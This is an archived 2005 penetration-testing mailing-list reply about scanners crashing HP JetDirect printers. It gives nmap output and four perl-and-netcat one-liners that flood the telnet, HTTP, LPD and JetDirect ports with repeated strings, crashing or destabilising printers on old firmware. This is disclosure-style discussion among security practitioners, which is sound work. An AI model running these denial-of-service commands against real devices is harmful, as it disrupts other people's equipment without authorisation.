Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Experiences with company nCircle and their IP360 product

From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Fri, 2 Dec 2005 19:50:41 +0100 (CET)
One other thing I've seen with nCircle (& a few other scanners), if you run internally & have any legacy HP jetdirect printers located on your network, you may want to check with nCircle to see if their scans still lock up those printers.
Actually, it's usually fairly easy to DoS printers, specially if they are using an old firmware release. Here are a few ways to reproduce some HP JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 -- it's quite old, i didn't bother to test newer releases): 

root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

1) TELNET. Crash all network services:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23
2) HTTP. Crash all network services with funny stack dump on paper:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80
3) PRINTER. The printer switches indefinitely between data recv and ready:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515
4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status:
   root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100
Pretty lame, isn't it? In case someone's interested i've scanned the funny stack dump printed on paper and put it on-line here: 

http://www.0xdeadbeef.info/stuff/hp-crash.jpg

Sincerely,

--
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707


------------------------------------------------------------------------------
Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: 

http://www.securityfocus.com/sponsor/pen-test_050831
-------------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: